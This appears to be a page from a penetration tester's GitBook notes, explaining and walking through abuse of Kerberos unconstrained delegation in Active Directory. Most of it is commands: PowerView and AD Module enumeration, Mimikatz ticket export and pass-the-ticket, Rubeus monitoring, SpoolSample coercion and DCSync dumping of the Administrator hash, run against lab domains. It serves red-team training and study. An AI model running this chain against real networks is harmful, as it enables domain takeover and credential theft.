RFC - Offensive Security Notes
  • Active Directory
    • Enumeration
      • Active Directory Module
        • Enumerating the Domain
        • Enumerating ACLs
      • PowerView 3.0
      • Verify connectivity to domain controller
      • WMI domain enumeration through root\directory\ldap
      • PAM Trust
      • DNS discovery
        • Get-DnsServerZone
    • Privilege Escalation
      • Kerberos Delegation
        • Unconstrained delegation
        • Constrained delegation
        • Resource-based Constrained Delegation
      • Escalating from child to parent domain
      • Abusing inter-forest trust
      • WSUS server abuse
      • ACL Enumeration with PowerView 2.0
    • Persistence
      • Kerberos attacks
        • Golden ticket
        • Silver ticket
      • DSRM (Directory Services Restore Mode)
  • Initial Access
    • VBA Macros
      • Mark-of-the-Web
  • Discovery
    • Juicy files
      • PowerShell history
    • Network Enumeration
      • Network discovery scans
        • Ping scan
      • Nmap
      • Perimeter firewall scanning for open outbound ports
  • Execution
    • WMI
      • Remote code execution using WMI
    • PowerShell
      • C# assembly in PowerShell
        • List load assembly
        • Add-Type
        • UnsafeNativeMethods
        • DelegateType Reflection
        • Reflective Load
    • C# .Net Assembly
      • Process injection
        • Debugging
        • Using VirtualAllocEx and WriteProcessMemory
        • Using NTAPI Undocumented Functions
    • ReverseShells
      • Linux
        • Stabilizing zsh shell
    • Metasploit
      • HTTPs Meterpreter
  • Exploitation
    • Win32 APIs
      • OpenProcess
      • VirtualAllocEx
      • WriteProcessMemory
      • CreateRemoteThread
  • Credential Access
    • Microsoft Windows
      • Windows credential audit and logon types
      • Local credentials (SAM and LSA)
      • Lsass from forensics dump
      • Access Tokens
        • SeImpersonatePrivilege
      • ntds.dit
        • Dumping the contents of ntds.dit files using PowerShell
      • Mimikatz
      • LAPS
  • Lateral Movement
    • Windows Lateral Movement
      • Remote Desktop Protocol (RDP)
      • PowerShell Remoting (PS Remote)
        • Kerberos double hoping
      • Windows Task Scheduler
    • Linux Lateral Movement
  • Persistence
  • Defence Evasion
    • Antimalware Scan Interface (AMSI)
      • Debugging AMSI with Frida
      • PowerShell Bypasses
      • JS/VBA Bypasses
    • PowerShell
      • PowerShell version 2
      • Constrained Language Mode
      • Just Enough Administration (JEA)
      • ScriptBlockLogging
    • Microsoft Defender
    • Anti-virus evasion
      • Evasion and bypassing detection within C#
        • Encryptors
          • Aes encryptor
        • Sandbox evasion
          • Time accelerated checks
    • AppLocker
      • InstallUtil
      • MsBuild
  • Network Pivoting
    • Proxies and port fowarding
      • SSH
      • Metasploit
      • Socat
      • SSH Shuttle
      • Windows netsh command
    • Network discovery and scanning
  • Exfiltration
    • Windows
      • Copy files over SMB
  • Services
    • MS SQL Server
      • Enumeration
      • UNC Path Injection
      • Privilege Escalation
      • Linked Servers
      • SQL Injection
  • Misc
    • CrackMapExec
    • Cheat sheets
  • Cloud
    • Azure
      • Authentication
      • Enumeration
        • AzureHound
        • Az.Powershell
        • Microsoft Graph PowerShell
      • Initial Access
        • Device Code Phishing
        • Family-Of-Client-Ids - FOCI
        • JWT Assertion
Powered by GitBook
On this page
  • Unconstrained delegation
  • Detecting
  • AD Module
  • Powerview 3.0
  • Exploiting
  • Force authentication
  • References
  1. Active Directory
  2. Privilege Escalation
  3. Kerberos Delegation

Unconstrained delegation

Unconstrained delegation

More specifically, the domain controller places a copy of the user’s TGT into the service ticket. When the user’s service ticket (TGS) is provided to the server for service access the server opens the TGS and places the user’s TGT into the LSASS for later use allowing the server to impersonate the user. Obtaining the ticket could lead to domain escalation as the ticket might belong to the machine account of the domain controller or a high privilege account like the domain administrator. For a computer to authenticate on behalf of other services (unconstrained delegation) two conditions are required:

  1. Account has the TRUSTED_FOR_DELEGATION flag in the User Account Control (UAC) flags.

  2. User account has not the NOT_DELEGATED flag set which by default non domain accounts have this flag.

Detecting

AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

Other interesting properties that can be enumerated are the:

  • TrustedToAuthForDelegation

  • msDS-AllowedToDelegateTo

  • PrincipalsAllowedToDelegateToAccount

Get-ADComputer "Hive" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo, PrincipalsAllowedToDelegateToAccount

Powerview 3.0

Get-DomainComputer -Unconstrained

Exploiting

## We must trick or wait for a domain admin to connect a service on appsrv.
## Now, if the command is run again:
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'

## The DA token could be reused:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgtDOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Force authentication

There are multiple protocols which can coerce the machine account of the domain controller to authenticate with other hosts on the system such as spoolsample and encrypting file services remote procedure call. However, capturing the ticket of the machine account requires Rubeus to run in monitor state mode.

Rubeus.exe monitor /monitorinterval:10 /targetuser:DC$ /nowrap

Execution of the printer bug will coerce the domain controller to authenticate with the workstation which is configured for unconstrained delegation.

SpoolSample.exe dc hive

The ticket granting ticket (TGT) of the domain controller machine account will received and captured by Rubeus.

The ticket will be in base64 format and therefore cannot be used directly. However, from a PowerShell console execution of the command below will convert the ticket and write the contents to a file with the .kirbi extension.

[IO.File]::WriteAllBytes("C:\Users\pentestlab.PURPLE\Desktop\DC.kirbi", [Convert]::FromBase64String("[base64string]"))

Using the Pass the Ticket within Mimikatz the current user account will get high privilege rights on the domain controller. This can be verified by using the DCSync technique to dump the NTLM hash of the domain admin account and get command execution via pass the hash on the domain controller.

kerberos::ptt DC.kirbi
lsadump::dcsync /domain:purple.lab /user:Administrator

References

PreviousKerberos DelegationNextConstrained delegation

Last updated 3 years ago

Unconstrained Delegation